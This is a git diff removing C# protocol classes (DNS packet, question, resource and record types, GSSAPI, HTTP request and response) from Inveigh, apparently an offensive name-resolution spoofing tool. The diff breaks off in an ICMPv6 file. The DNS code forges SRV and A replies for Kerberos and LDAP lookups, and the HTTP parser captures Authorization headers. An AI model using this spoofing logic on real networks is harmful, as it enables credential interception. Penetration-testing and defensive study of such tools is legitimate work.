} - - enum ServicePort : ushort - { - Kerberos = 88, - LDAP = 389, - KPassword = 464, - GC = 3268 - } - - public DNSPacket() - { - } - - public DNSPacket(byte[] data) - { - ReadBytes(data); - } - - public DNSPacket ReadBytes(byte[] data) - { - this.Header = new DNSHeader(data); - this.Question = new DNSQuestion(data); - return this; - } - - public byte[] GetBytes(uint ttl, uint serial, string replyIP, string replyIPv6) - { - byte[] rdata = new byte[0]; - ushort arCount = 0; - ushort index = 12; - index |= (1 << 15); // set first 2 bits to 1 to indicate compression is being used - index |= (1 << 14); - byte[] indexData = BitConverter.GetBytes(index); - Array.Reverse(indexData); - byte[] nameData = this.Question.QName; - - switch (this.Question.Type) - { - case "A": - arCount = 0; - rdata = new DNSRecordA(replyIP).GetBytes(); - break; - - case "AAAA": - arCount = 0; - - if (!String.IsNullOrEmpty(replyIPv6)) - { - rdata = new DNSRecordAAAA(replyIPv6).GetBytes(); - } - - break; - - case "SRV": - arCount = 1; - nameData = indexData; - index += (ushort)(this.Question.QName.Length + 14); - ushort port = 0; - - if (this.Question.Name.StartsWith("_ldap.")) - { - port = (ushort)ServicePort.LDAP; - } - else if (this.Question.Name.StartsWith("_kerberos.")) - { - port = (ushort)ServicePort.Kerberos; - } - else if (this.Question.Name.StartsWith("_kpassword.")) - { - port = (ushort)ServicePort.KPassword; - } - else if (this.Question.Name.StartsWith("_gc.")) - { - port = (ushort)ServicePort.GC; - } - - rdata = new DNSRecordSRV().GetBytes(this.Host, port); - break; - - case "SOA": - arCount = 1; - rdata = new DNSRecordSOA(serial).GetBytes(this.Host, 12); - index += (ushort)(this.Question.QName.Length + 14); - break; - } - - this.Header = new DNSHeader - { - ID = this.Header.ID, - QR = true, - Opcode = "0000", - AA = false, - TC = false, - RD = false, - RA = false, - Z = "000", - RCode = "0000", - QDCount = 1, - ANCount = 1, - ARCount = arCount - }; - - this.Resource = new DNSResource - { - Name = nameData, - Type = this.Question.QType, - Class = this.Question.QClass, - TTL = ttl, - RDLength = (ushort)rdata.Length, - RData = rdata - }; - - if (arCount == 1) - { - this.Resource.Name = indexData; - indexData = BitConverter.GetBytes(index); - Array.Reverse(indexData); - - this.Additional = new DNSResource - { - Name = indexData, - Type = new byte[] { 0x00, 0x01 }, - Class = this.Question.QClass, - TTL = ttl, - RDLength = 4, - RData = new DNSRecordA(replyIP).GetBytes() - }; - - return Utilities.BlockCopy(this.Header.GetBytes(), this.Question.GetBytes(), this.Resource.GetBytes(), this.Additional.GetBytes()); - } - - return Utilities.BlockCopy(this.Header.GetBytes(), this.Question.GetBytes(), this.Resource.GetBytes()); - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/DNS/DNSQuestion.cs b/Inveigh/Protocols/Quiddity/Protocols/DNS/DNSQuestion.cs deleted file mode 100644 index 34e2fcb..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/DNS/DNSQuestion.cs +++ /dev/null @@ -1,193 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.IO; -using System.Text; - -namespace Quiddity.DNS -{ - class DNSQuestion - { - - // https://tools.ietf.org/html/rfc1035 - public byte[] QName { get; set; } - public byte[] QType { get; set; } - public byte[] QClass { get; set; } - - // Custom - public string Name { get; set; } - public string Type { get; set; } - - public DNSQuestion() - { - this.QName = new byte[0]; - this.QType = new byte[0]; - this.QClass = new byte[0]; - } - - public DNSQuestion(byte[] data) - { - ReadBytes(data, 12); - } - - public DNSQuestion(byte[] data, int offset) - { - ReadBytes(data, offset); - } - - public void ReadBytes(byte[] data, int offset) - { - int segmentLength = data[offset]; - int lengthIndex = offset; - int length = segmentLength + 1; - - do - { - lengthIndex += segmentLength + 1; - segmentLength = data[lengthIndex]; - length += segmentLength + 1; - } - while (segmentLength != 0); - - using (MemoryStream memoryStream = new MemoryStream(data)) - { - PacketReader packetReader = new PacketReader(memoryStream); - memoryStream.Position = offset; - this.QName = packetReader.ReadBytes(length); - this.QType = packetReader.ReadBytes(2); - this.QClass = packetReader.ReadBytes(2); - } - - this.Name = ConvertName(); - this.Type = GetType(); - } - - public byte[] GetBytes() - { - - using (MemoryStream memoryStream = new MemoryStream()) - { - PacketWriter packetWriter = new PacketWriter(memoryStream); - packetWriter.Write(this.QName); - packetWriter.Write(this.QType); - packetWriter.Write(this.QClass); - return memoryStream.ToArray(); - } - - } - - protected virtual string ConvertName() - { - string hostname = ""; - int hostnameLength = this.QName[0]; - int index = 0; - int i = 0; - - do - { - int hostnameSegmentLength = hostnameLength; - byte[] hostnameSegment = new byte[hostnameSegmentLength]; - Buffer.BlockCopy(this.QName, (index + 1), hostnameSegment, 0, hostnameSegmentLength); - hostname += Encoding.UTF8.GetString(hostnameSegment); - index += hostnameLength + 1; - hostnameLength = this.QName[index]; - i++; - - if (hostnameLength > 0) - { - hostname += "."; - } - - } - while (hostnameLength != 0 && i <= 127); - - return hostname; - } - - protected new virtual string GetType() - { - string type = ""; - - switch (BitConverter.ToString(this.QType)) - { - - case "00-01": - type = "A"; - break; - - case "00-1C": - type = "AAAA"; - break; - - case "00-05": - type = "CNAME"; - break; - - case "00-27": - type = "DNAME"; - break; - - case "00-0F": - type = "MX"; - break; - - case "00-02": - type = "NS"; - break; - - case "00-0C": - type = "PTR"; - break; - - case "00-06": - type = "SOA"; - break; - - case "00-21": - type = "SRV"; - break; - - case "00-10": - type = "TXT"; - break; - - case "00-FF": - type = "ANY"; - break; - - } - - return type; - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/DNS/DNSResource.cs b/Inveigh/Protocols/Quiddity/Protocols/DNS/DNSResource.cs deleted file mode 100644 index 258a08c..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/DNS/DNSResource.cs +++ /dev/null @@ -1,122 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using Quiddity.Support; -using System.IO; -using System.Net; - -namespace Quiddity.DNS -{ - - class DNSResource - { - - // https://tools.ietf.org/html/rfc1035 - public byte[] Name { get; set; } - public byte[] Type { get; set; } - public byte[] Class { get; set; } - public uint TTL { get; set; } - public ushort RDLength{ get; set; } - public byte[] RData { get; set; } - - //custom - public string Host { get; set; } - - public DNSResource() - { - - } - - public void ReadBytes(byte[] data, int offset) - { - - using (MemoryStream memoryStream = new MemoryStream(data)) - { - PacketReader packetReader = new PacketReader(memoryStream); - memoryStream.Position = offset; - this.Name = packetReader.ReadBytes(2); - this.Type = packetReader.ReadBytes(2); - this.Class = packetReader.ReadBytes(2); - this.TTL = packetReader.ReadUInt32(); - this.RDLength = packetReader.ReadUInt16(); - this.RData = packetReader.ReadBytes(this.RDLength); - } - - } - - public byte[] GetBytes() - { - - using (MemoryStream memoryStream = new MemoryStream()) - { - PacketWriter packetWriter = new PacketWriter(memoryStream); - packetWriter.Write(this.Name); - packetWriter.Write(this.Type); - packetWriter.Write(this.Class); - packetWriter.BigEndianWrite(this.TTL); - packetWriter.BigEndianWrite(this.RDLength); - packetWriter.Write(this.RData); - return memoryStream.ToArray(); - } - - } - - public byte[] GetBytes(DNSQuestion RequestQuestion, uint ttl, string data, byte[] id) - { - byte[] rdata = IPAddress.Parse(data).GetAddressBytes(); - - DNSHeader responseHeader = new DNSHeader - { - ID = id, - QR = true, - Opcode = "0000", - AA = false, - TC = false, - RD = false, - RA = false, - Z = "000", - RCode = "0000", - QDCount = 1, - ANCount = 1 - }; - - this.Name = RequestQuestion.QName; - this.Type = RequestQuestion.QType; - this.Class = RequestQuestion.QClass; - this.TTL = ttl; - this.RDLength = (ushort)rdata.Length; - this.RData = rdata; - - return Utilities.BlockCopy(responseHeader.GetBytes(), RequestQuestion.GetBytes(), this.GetBytes()); - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/DNS/RDATA/DNSRecordA.cs b/Inveigh/Protocols/Quiddity/Protocols/DNS/RDATA/DNSRecordA.cs deleted file mode 100644 index 7d15405..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/DNS/RDATA/DNSRecordA.cs +++ /dev/null @@ -1,33 +0,0 @@ -using System; -using System.Collections.Generic; -using System.Linq; -using System.Net; -using System.Text; - -namespace Quiddity.DNS -{ - class DNSRecordA - { - public byte[] Address { get; set; } - - public DNSRecordA() - { - - } - - public DNSRecordA(string address) - { - this.Address = IPAddress.Parse(address).GetAddressBytes(); - } - public byte[] GetBytes() - { - return this.Address; - } - - public byte[] GetBytes(string address) - { - return IPAddress.Parse(address).GetAddressBytes(); - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/DNS/RDATA/DNSRecordAAAA.cs b/Inveigh/Protocols/Quiddity/Protocols/DNS/RDATA/DNSRecordAAAA.cs deleted file mode 100644 index ca63c6b..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/DNS/RDATA/DNSRecordAAAA.cs +++ /dev/null @@ -1,34 +0,0 @@ -using System; -using System.Collections.Generic; -using System.Linq; -using System.Net; -using System.Text; - -namespace Quiddity.DNS -{ - class DNSRecordAAAA - { - - public byte[] Address { get; set; } - - public DNSRecordAAAA() - { - - } - - public DNSRecordAAAA(string address) - { - this.Address = IPAddress.Parse(address).GetAddressBytes(); - } - public byte[] GetBytes() - { - return this.Address; - } - - public byte[] GetBytes(string address) - { - return IPAddress.Parse(address).GetAddressBytes(); - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/DNS/RDATA/DNSRecordSOA.cs b/Inveigh/Protocols/Quiddity/Protocols/DNS/RDATA/DNSRecordSOA.cs deleted file mode 100644 index 23fcfe7..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/DNS/RDATA/DNSRecordSOA.cs +++ /dev/null @@ -1,85 +0,0 @@ -using Quiddity.Support; -using System; -using System.Collections.Generic; -using System.IO; -using System.Linq; -using System.Text; - -namespace Quiddity.DNS -{ - class DNSRecordSOA - { - // https://tools.ietf.org/html/rfc1035 - public byte[] MName { get; set; } - public byte[] RName { get; set; } - public uint Serial { get; set; } - public uint Refresh { get; set; } - public uint Retry { get; set; } - public uint Expire { get; set; } - public uint Minium { get; set; } - - public DNSRecordSOA() - { - this.Refresh = 900; - this.Retry = 600; - this.Expire = 86400; - this.Minium = 3600; - } - - public DNSRecordSOA(uint serial) - { - this.Serial = serial; - this.Refresh = 900; - this.Retry = 600; - this.Expire = 86400; - this.Minium = 3600; - } - - public byte[] GetBytes() - { - using (MemoryStream memoryStream = new MemoryStream()) - { - PacketWriter packetWriter = new PacketWriter(memoryStream); - packetWriter.Write(this.MName); - packetWriter.Write(this.RName); - packetWriter.BigEndianWrite(this.Serial); - packetWriter.BigEndianWrite(this.Refresh); - packetWriter.BigEndianWrite(this.Retry); - packetWriter.BigEndianWrite(this.Expire); - packetWriter.BigEndianWrite(this.Minium); - return memoryStream.ToArray(); - } - } - - public byte[] GetBytes(string host, ushort index) - { - index |= (1 << 15); - index |= (1 << 14); - byte[] indexData = BitConverter.GetBytes(index); - Array.Reverse(indexData); - - byte[] hostData = Utilities.GetDNSNameBytes(host, false); - byte[] hostCompressed = new byte[hostData[0] + 3]; - Buffer.BlockCopy(hostData, 0, hostCompressed, 0, hostData[0] + 1); - Buffer.BlockCopy(indexData, 0, hostCompressed, hostCompressed.Length - 2, 2); - byte[] authoritytData = Utilities.GetDNSNameBytes("hostmaster", false); - byte[] authorityCompressed = new byte[authoritytData[0] + 3]; - Buffer.BlockCopy(authoritytData, 0, authorityCompressed, 0, authoritytData[0] + 1); - Buffer.BlockCopy(indexData, 0, authorityCompressed, authorityCompressed.Length - 2, 2); - - using (MemoryStream memoryStream = new MemoryStream()) - { - PacketWriter packetWriter = new PacketWriter(memoryStream); - packetWriter.Write(hostCompressed); - packetWriter.Write(authorityCompressed); - packetWriter.BigEndianWrite(this.Serial); - packetWriter.BigEndianWrite(this.Refresh); - packetWriter.BigEndianWrite(this.Retry); - packetWriter.BigEndianWrite(this.Expire); - packetWriter.BigEndianWrite(this.Minium); - return memoryStream.ToArray(); - } - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/DNS/RDATA/DNSRecordSRV.cs b/Inveigh/Protocols/Quiddity/Protocols/DNS/RDATA/DNSRecordSRV.cs deleted file mode 100644 index 391b671..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/DNS/RDATA/DNSRecordSRV.cs +++ /dev/null @@ -1,42 +0,0 @@ -using Quiddity.Support; -using System; -using System.Collections.Generic; -using System.IO; -using System.Linq; -using System.Text; - -namespace Quiddity.DNS -{ - class DNSRecordSRV : DNSResource - { - // https://datatracker.ietf.org/doc/html/rfc2782 - public byte[] Service { get; set; } - public byte[] Proto { get; set; } - public ushort Priority { get; set; } - public ushort Weight { get; set; } - public ushort Port { get; set; } - public byte[] Target { get; set; } - - public DNSRecordSRV() - { - this.Priority = 0; - this.Weight = 100; - } - - public byte[] GetBytes(string target, ushort port) - { - - using (MemoryStream memoryStream = new MemoryStream()) - { - PacketWriter packetWriter = new PacketWriter(memoryStream); - packetWriter.BigEndianWrite(this.Priority); - packetWriter.BigEndianWrite(this.Weight); - packetWriter.BigEndianWrite(port); - packetWriter.Write(Utilities.GetDNSNameBytes(target, true)); - return memoryStream.ToArray(); - } - - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/GSSAPI/GSSAPIInitSecContext.cs b/Inveigh/Protocols/Quiddity/Protocols/GSSAPI/GSSAPIInitSecContext.cs deleted file mode 100644 index 34c70cb..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/GSSAPI/GSSAPIInitSecContext.cs +++ /dev/null @@ -1,49 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ - -namespace Quiddity.GSSAPI -{ - class GSSAPIInitSecContext - { - - /* - https://tools.ietf.org/html/rfc4178#appendix-A - */ - public byte[] OID { get; set; } - - public GSSAPIInitSecContext() - { - this.OID = new byte[8] { 0x06, 0x06, 0x2b, 0x06, 0x01, 0x05, 0x05, 0x02 } ; - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/HTTP/HTTPRequest.cs b/Inveigh/Protocols/Quiddity/Protocols/HTTP/HTTPRequest.cs deleted file mode 100644 index 7423081..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/HTTP/HTTPRequest.cs +++ /dev/null @@ -1,159 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using Quiddity.Support; -using System; -using System.Collections.Generic; -using System.IO; -using System.Linq; -using System.Text; - -namespace Quiddity.HTTP -{ - class HTTPRequest - { - public string Method { get; set; } - public string URI { get; set; } - public string Version { get; set; } - public string Host { get; set; } - public string Connection { get; set; } - public string UserAgent { get; set; } - public string Accept { get; set; } - public string AcceptEncoding { get; set; } - public string AcceptLanguage { get; set; } - public string Authorization { get; set; } - public string ProxyAuthorization { get; set; } - - public void ReadBytes(byte[] data, int offset) - { - - using (MemoryStream memoryStream = new MemoryStream(data)) - { - PacketReader packetReader = new PacketReader(memoryStream); - memoryStream.Position = offset; - int index = Array.IndexOf(data, 0x20, 0); - - if (index > -1) - { - this.Method = Encoding.UTF8.GetString(packetReader.ReadBytes(index)); - memoryStream.Position++; - index = Array.IndexOf(data, 0x20, (int)memoryStream.Position); - - if (index > -1) - { - index -= (int)memoryStream.Position; - this.URI = Encoding.UTF8.GetString(packetReader.ReadBytes(index)); - memoryStream.Position++; - index = Array.IndexOf(data, 0x0d, (int)memoryStream.Position); - - if (index > -1) - { - index -= (int)memoryStream.Position; - this.Version = Encoding.UTF8.GetString(packetReader.ReadBytes(index)); - memoryStream.Position += 2; - } - - } - - } - - while (index > -1) - { - index = Array.IndexOf(data, 0x20, (int)memoryStream.Position); - - if (index > -1) - { - index -= (int)memoryStream.Position; - string field = Encoding.UTF8.GetString(packetReader.ReadBytes(index)); - memoryStream.Position++; - index = Array.IndexOf(data, 0x0d, (int)memoryStream.Position); - index -= (int)memoryStream.Position; - - if (index > -1) - { - string value = Encoding.UTF8.GetString(packetReader.ReadBytes(index)); - GetField(field, value); - } - - memoryStream.Position += 2; - } - - } - - } - - } - - public void GetField(string field, string value) - { - - switch (field.ToUpper()) - { - - case "HOST:": - this.Host = value; - break; - - case "CONNECTION:": - this.Connection = value; - break; - - case "USER-AGENT:": - this.UserAgent = value; - break; - - case "ACCEPT:": - this.Accept = value; - break; - - case "ACCEPT-ENCODING:": - this.AcceptEncoding = value; - break; - - case "ACCEPT-LANGUAGE:": - this.AcceptLanguage = value; - break; - - case "AUTHORIZATION:": - this.Authorization = value; - break; - - case "PROXY-AUTHORIZATION:": - this.ProxyAuthorization = value; - break; - - } - - } - - } - -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/HTTP/HTTPResponse.cs b/Inveigh/Protocols/Quiddity/Protocols/HTTP/HTTPResponse.cs deleted file mode 100644 index 4ac632d..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/HTTP/HTTPResponse.cs +++ /dev/null @@ -1,166 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using Quiddity.Support; -using System; -using System.Collections.Generic; -using System.IO; -using System.Linq; -using System.Text; - -namespace Quiddity.HTTP -{ - class HTTPResponse - { - public string Version { get; set; } - public string StatusCode { get; set; } - public string ReasonPhrase { get; set; } - public string Server { get; set; } - public string Date { get; set; } - public string ContentType { get; set; } - public string ContentLength { get; set; } - public string Connection { get; set; } - public string CacheControl { get; set; } - public string Allow { get; set; } - public string Public { get; set; } - public string DAV { get; set; } - public string Author { get; set; } - public string ProxyAuthenticate { get; set; } - public string WWWAuthenticate { get; set; } - public byte[] Message { get; set; } - - public byte[] GetBytes() - { - - if (!Utilities.ArrayIsNullOrEmpty(this.Message)) - { - this.ContentLength = Convert.ToString(this.Message.Length); - } - - using (MemoryStream memoryStream = new MemoryStream()) - { - PacketWriter packetWriter = new PacketWriter(memoryStream); - packetWriter.StringWrite(this.Version); - packetWriter.Write(new byte[1] { 0x20 }); - packetWriter.StringWrite(this.StatusCode); - packetWriter.Write(new byte[1] { 0x20 }); - packetWriter.StringWrite(this.ReasonPhrase); - packetWriter.Write(new byte[2] { 0x0d, 0x0a }); - - if (!String.IsNullOrEmpty(this.Connection)) - { - packetWriter.StringWrite("Connection: "); - packetWriter.StringWrite(this.Connection); - packetWriter.Write(new byte[2] { 0x0d, 0x0a }); - } - - if (!String.IsNullOrEmpty(this.Allow)) - { - packetWriter.StringWrite("Allow: "); - packetWriter.StringWrite(this.Allow); - packetWriter.Write(new byte[2] { 0x0d, 0x0a }); - } - - if (!String.IsNullOrEmpty(this.Public)) - { - packetWriter.StringWrite("Public: "); - packetWriter.StringWrite(this.Public); - packetWriter.Write(new byte[2] { 0x0d, 0x0a }); - } - - if (!String.IsNullOrEmpty(this.DAV)) - { - packetWriter.StringWrite("DAV: "); - packetWriter.StringWrite(this.DAV); - packetWriter.Write(new byte[2] { 0x0d, 0x0a }); - } - - if (!String.IsNullOrEmpty(this.Author)) - { - packetWriter.StringWrite("MS-Author-via: "); - packetWriter.StringWrite(this.Author); - packetWriter.Write(new byte[2] { 0x0d, 0x0a }); - } - - if (!String.IsNullOrEmpty(this.Server)) - { - packetWriter.StringWrite("Server: "); - packetWriter.StringWrite(this.Server); - packetWriter.Write(new byte[2] { 0x0d, 0x0a }); - } - - if (!String.IsNullOrEmpty(this.Date)) - { - packetWriter.StringWrite("Date: "); - packetWriter.StringWrite(this.Date); - packetWriter.Write(new byte[2] { 0x0d, 0x0a }); - } - - packetWriter.StringWrite("Content-Length: "); - packetWriter.StringWrite(this.ContentLength); - packetWriter.Write(new byte[2] { 0x0d, 0x0a }); - - if (!String.IsNullOrEmpty(this.ProxyAuthenticate)) - { - packetWriter.StringWrite("Proxy-Authenticate: "); - packetWriter.StringWrite(this.ProxyAuthenticate); - packetWriter.Write(new byte[2] { 0x0d, 0x0a }); - } - - if (!String.IsNullOrEmpty(this.WWWAuthenticate)) - { - packetWriter.StringWrite("WWW-Authenticate: "); - packetWriter.StringWrite(this.WWWAuthenticate); - packetWriter.Write(new byte[2] { 0x0d, 0x0a }); - } - - if (!String.IsNullOrEmpty(this.ContentType)) - { - packetWriter.StringWrite("Content-Type: "); - packetWriter.StringWrite(this.ContentType); - packetWriter.Write(new byte[2] { 0x0d, 0x0a }); - } - - packetWriter.Write(new byte[2] { 0x0d, 0x0a }); - - if (!Utilities.ArrayIsNullOrEmpty(this.Message)) - { - packetWriter.Write(this.Message); - } - - return memoryStream.ToArray(); - } - - } - - } - -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/ICMPv6/ICMPv6RouterAdvertisement.cs b/Inveigh/Protocols/Quiddity/Protocols/ICMPv6/ICMPv6RouterAdvertisement.cs deleted file mode 100644 index fec13c4..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/ICMPv6/ICMPv6RouterAdvertisement.cs +++ /dev/null @@ -1,107 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS 